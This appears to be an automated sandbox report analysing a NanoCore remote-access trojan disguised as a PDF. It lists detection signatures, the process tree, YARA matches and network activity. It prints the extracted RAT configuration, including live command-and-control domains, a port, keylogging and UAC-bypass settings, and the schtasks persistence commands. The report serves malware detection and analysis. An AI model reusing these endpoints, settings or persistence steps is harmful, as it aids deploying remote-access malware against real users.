Windows Analysis Report
026910003102350.pdf.scr.exe

Overview

General Information

Sample Name: 026910003102350.pdf.scr.exe
Analysis ID: 796783
MD5: c2a80ccf6362bba805072de9ce963ea5
SHA1: c7a0ca8b35e2c08e69f48d754dbdbf20f2d1d53f
SHA256: 592217d2590ae9ca688346688b2d7d13a78190f9562889597ebb79060136034c
Tags: exe
Infos:

Detection

Nanocore
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: NanoCore
Detected Nanocore Rat
Yara detected AntiVM autoit script
Antivirus detection for URL or domain
Antivirus detection for dropped file
Yara detected Nanocore RAT
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Scheduled temp file as task from temp location
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Starts an encoded Visual Basic Script (VBE)
Creates multiple autostart registry keys
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Creates autostart registry keys with suspicious values (likely registry only malware)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses dynamic DNS services
Writes to foreign memory regions
Protects its processes via BreakOnTermination flag
C2 URLs / IPs found in malware configuration
Found API chain indicative of sandbox detection
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to simulate keystroke presses
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
OS version to string mapping found (often used in BOTs)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Contains functionality to query the security center for anti-virus and firewall products
Contains functionality to execute programs as a different user
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
AV process strings found (often used to terminate AV products)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
File is packed with WinRar
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Potential key logger detected (key state polling based)
Contains functionality to simulate mouse events
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Classification

  • System is w10x64
  • 026910003102350.pdf.scr.exe (PID: 4980 cmdline: C:\Users\user\Desktop\026910003102350.pdf.scr.exe MD5: C2A80CCF6362BBA805072DE9CE963EA5)
    • wscript.exe (PID: 2312 cmdline: "C:\Windows\System32\wscript.exe" daitsfsh-waune.icm.vbe MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • itugx.exe (PID: 5920 cmdline: "C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe" rnnsh.xls MD5: 8A57722EC9067FAAA9FF2980C5F02838)
        • RegSvcs.exe (PID: 5960 cmdline: C:\Users\user\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
          • schtasks.exe (PID: 4544 cmdline: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
            • conhost.exe (PID: 5648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • schtasks.exe (PID: 2216 cmdline: schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp8D34.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
            • conhost.exe (PID: 1648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • itugx.exe (PID: 3300 cmdline: "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls MD5: 8A57722EC9067FAAA9FF2980C5F02838)
    • RegSvcs.exe (PID: 4736 cmdline: C:\Users\user\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • RegSvcs.exe (PID: 5072 cmdline: C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0 MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 4124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • dhcpmon.exe (PID: 2960 cmdline: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0 MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 5092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • wscript.exe (PID: 2896 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • itugx.exe (PID: 4036 cmdline: "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls MD5: 8A57722EC9067FAAA9FF2980C5F02838)
      • RegSvcs.exe (PID: 3624 cmdline: C:\Users\user\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • dhcpmon.exe (PID: 576 cmdline: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 1880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • itugx.exe (PID: 5928 cmdline: "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls MD5: 8A57722EC9067FAAA9FF2980C5F02838)
    • RegSvcs.exe (PID: 5508 cmdline: C:\Users\user\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • wscript.exe (PID: 4776 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • itugx.exe (PID: 5420 cmdline: "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls MD5: 8A57722EC9067FAAA9FF2980C5F02838)
      • RegSvcs.exe (PID: 5736 cmdline: C:\Users\user\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • itugx.exe (PID: 5552 cmdline: "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls MD5: 8A57722EC9067FAAA9FF2980C5F02838)
    • RegSvcs.exe (PID: 3928 cmdline: C:\Users\user\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • wscript.exe (PID: 5776 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • itugx.exe (PID: 1712 cmdline: "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls MD5: 8A57722EC9067FAAA9FF2980C5F02838)
      • RegSvcs.exe (PID: 4764 cmdline: C:\Users\user\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • cleanup
{"Version": "1.2.2.0", "Mutex": "d95e5ad5-6193-4689-a919-7befded6", "Group": "ITEego", "Domain1": "december2n.duckdns.org", "Domain2": "december2nd.ddns.net", "Port": 60705, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Enable", "SetCriticalProcess": "Enable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Enable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 29996, "MutexTimeout": 4996, "LanTimeout": 2500, "WanTimeout": 8009, "BufferSize": "02000100", "MaxPacketSize": "", "GCThreshold": "", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      
<Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}
Source | Rule | Description | Author | Strings
00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth (Nextron Systems)
  • 0x1104d:$x1: NanoCore.ClientPluginHost
  • 0x1108a:$x2: IClientNetworkHost
  • 0x14bbd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
    00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp | NanoCore | unknown | Kevin Breen <kevin@techanarchy.net>
    • 0x10db5:$a: NanoCore
    • 0x10dc5:$a: NanoCore
    • 0x10ff9:$a: NanoCore
    • 0x1100d:$a: NanoCore
    • 0x1104d:$a: NanoCore
    • 0x10e14:$b: ClientPlugin
    • 0x11016:$b: ClientPlugin
    • 0x11056:$b: ClientPlugin
    • 0x10f3b:$c: ProjectData
    • 0x11942:$d: DESCrypto
    • 0x1930e:$e: KeepAlive
    • 0x172fc:$g: LogClientMessage
    • 0x134f7:$i: get_Connected
    • 0x11c78:$j: #=q
    • 0x11ca8:$j: #=q
    • 0x11cc4:$j: #=q
    • 0x11cf4:$j: #=q
    • 0x11d10:$j: #=q
    • 0x11d2c:$j: #=q
    • 0x11d5c:$j: #=q
    • 0x11d78:$j: #=q
    00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Nanocore_d8c4e3c5 | unknown | unknown
    • 0x1104d:$a1: NanoCore.ClientPluginHost
    • 0x1100d:$a2: NanoCore.ClientPlugin
    • 0x12f66:$b1: get_BuilderSettings
    • 0x10e69:$b2: ClientLoaderForm.resources
    • 0x12686:$b3: PluginCommand
    • 0x1103e:$b4: IClientAppHost
    • 0x1b4be:$b5: GetBlockHash
    • 0x135be:$b6: AddHostEntry
    • 0x172b1:$b7: LogClientException
    • 0x1352b:$b8: PipeExists
    • 0x11077:$b9: IClientLoggingHost
    00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth (Nextron Systems)
    • 0x103bd:$x1: NanoCore.ClientPluginHost
    • 0x103fa:$x2: IClientNetworkHost
    • 0x13f2d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    Source | Rule | Description | Author | Strings
    28.3.itugx.exe.146edb8.0.raw.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth (Nextron Systems)
    • 0x1018d:$x1: NanoCore.ClientPluginHost
    • 0x101ca:$x2: IClientNetworkHost
    • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    28.3.itugx.exe.146edb8.0.raw.unpack | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth (Nextron Systems)
    • 0xff05:$x1: NanoCore Client.exe
    • 0x1018d:$x2: NanoCore.ClientPluginHost
    • 0x117c6:$s1: PluginCommand
    • 0x117ba:$s2: FileCommand
    • 0x1266b:$s3: PipeExists
    • 0x18422:$s4: PipeCreated
    • 0x101b7:$s5: IClientLoggingHost
    28.3.itugx.exe.146edb8.0.raw.unpack | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
      28.3.itugx.exe.146edb8.0.raw.unpack | MALWARE_Win_NanoCore | Detects NanoCore | ditekSHen
      • 0xfef5:$x1: NanoCore Client
      • 0xff05:$x1: NanoCore Client
      • 0x1014d:$x2: NanoCore.ClientPlugin
      • 0x1018d:$x3: NanoCore.ClientPluginHost
      • 0x10142:$i1: IClientApp
      • 0x10163:$i2: IClientData
      • 0x1016f:$i3: IClientNetwork
      • 0x1017e:$i4: IClientAppHost
      • 0x101a7:$i5: IClientDataHost
      • 0x101b7:$i6: IClientLoggingHost
      • 0x101ca:$i7: IClientNetworkHost
      • 0x101dd:$i8: IClientUIHost
      • 0x101eb:$i9: IClientNameObjectCollection
      • 0x10207:$i10: IClientReadOnlyNameObjectCollection
      • 0xff54:$s1: ClientPlugin
      • 0x10156:$s1: ClientPlugin
      • 0x1064a:$s2: EndPoint
      • 0x10653:$s3: IPAddress
      • 0x1065d:$s4: IPEndPoint
      • 0x12093:$s6: get_ClientSettings
      • 0x12637:$s7: get_Connected
      28.3.itugx.exe.146edb8.0.raw.unpack | NanoCore | unknown | Kevin Breen <kevin@techanarchy.net>
      • 0xfef5:$a: NanoCore
      • 0xff05:$a: NanoCore
      • 0x10139:$a: NanoCore
      • 0x1014d:$a: NanoCore
      • 0x1018d:$a: NanoCore
      • 0xff54:$b: ClientPlugin
      • 0x10156:$b: ClientPlugin
      • 0x10196:$b: ClientPlugin
      • 0x1007b:$c: ProjectData
      • 0x10a82:$d: DESCrypto
      • 0x1844e:$e: KeepAlive
      • 0x1643c:$g: LogClientMessage
      • 0x12637:$i: get_Connected
      • 0x10db8:$j: #=q
      • 0x10de8:$j: #=q
      • 0x10e04:$j: #=q
      • 0x10e34:$j: #=q
      • 0x10e50:$j: #=q
      • 0x10e6c:$j: #=q
      • 0x10e9c:$j: #=q
      • 0x10eb8:$j: #=q

      AV Detection

      Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 5960, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      E-Banking Fraud

      Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 5960, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      Persistence and Installation Behavior

      Source: Process started, Author: Joe Security, Data: Command: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmp, CommandLine: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmp, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ParentImage: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ParentProcessId: 5960, ParentProcessName: RegSvcs.exe, ProcessCommandLine: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmp, ProcessId: 4544, ProcessName: schtasks.exe

      Stealing of Sensitive Information

      Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 5960, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      Remote Access Functionality

      Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 5960, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
      No Snort rule has matched


      AV Detection

      Source: december2n.duckdns.org, Avira URL Cloud: Label: malware
      Source: december2nd.ddns.net, Avira URL Cloud: Label: malware
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe, Avira: detection malicious, Label: DR/AutoIt.Gen
      Source: Yara match, File source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR
      Source: Yara match, File source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR
      Source: Yara match, File source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR
      Source: Yara match, File source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR
      Source: Yara match, File source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR
      Source: Yara match, File source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR
      Source: Yara match, File source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR
      Source: Yara match, File source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR
      Source: 026910003102350.pdf.scr.exe, ReversingLabs: Detection: 46%
      Source: 026910003102350.pdf.scr.exe, Virustotal: Detection: 45%
      Source: december2nd.ddns.net, Virustotal: Detection: 12%
      Source: december2n.duckdns.org, Virustotal: Detection: 5%
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe, ReversingLabs: Detection: 46%
      Source: 3.2.RegSvcs.exe.60b0000.7.unpack, Avira: Label: TR/NanoCore.fadte
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
      Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "d95e5ad5-6193-4689-a919-7befded6", "Group": "ITEego", "Domain1": "december2n.duckdns.org", "Domain2": "december2nd.ddns.net", "Port": 60705, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Enable", "SetCriticalProcess": "Enable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Enable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 29996, "MutexTimeout": 4996, "LanTimeout": 2500, "WanTimeout": 8009, "BufferSize": "02000100", "MaxPacketSize": "", "GCThreshold": "", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n 
<Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}
      Source: 026910003102350.pdf.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 026910003102350.pdf.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 026910003102350.pdf.scr.exe
      Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000003.00000000.380101330.0000000000E82000.00000002.00000001.01000000.0000000B.sdmp, RegSvcs.exe.2.dr
      Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000003.00000000.380101330.0000000000E82000.00000002.00000001.01000000.0000000B.sdmp, RegSvcs.exe.2.dr
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CCA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00CCA69B
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CDC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00CDC220
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CEB348 FindFirstFileExA,0_2_00CEB348
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0037E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,2_2_0037E387
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0037D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_0037D836
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0038A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0038A0FA
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0038A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_0038A488
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_003865F1 FindFirstFileW,FindNextFileW,FindClose,2_2_003865F1
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0034C642 FindFirstFileExW,2_2_0034C642
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00387248 FindFirstFileW,FindClose,2_2_00387248
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_003872E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,2_2_003872E9
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0037DB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_0037DB69

      Networking

      Source: unknownDNS query: name: december2n.duckdns.org
      Source: unknownDNS query: name: december2nd.ddns.net
      Source: Malware configuration extractorURLs: december2n.duckdns.org
      Source: Malware configuration extractorURLs: december2nd.ddns.net
      Source: Joe Sandbox ViewASN Name: SPD-NETTR SPD-NETTR
      Source: Joe Sandbox ViewIP Address: 212.193.30.230 212.193.30.230
      Source: global trafficTCP traffic: 192.168.2.5:49700 -> 212.193.30.230:60705
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
      Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
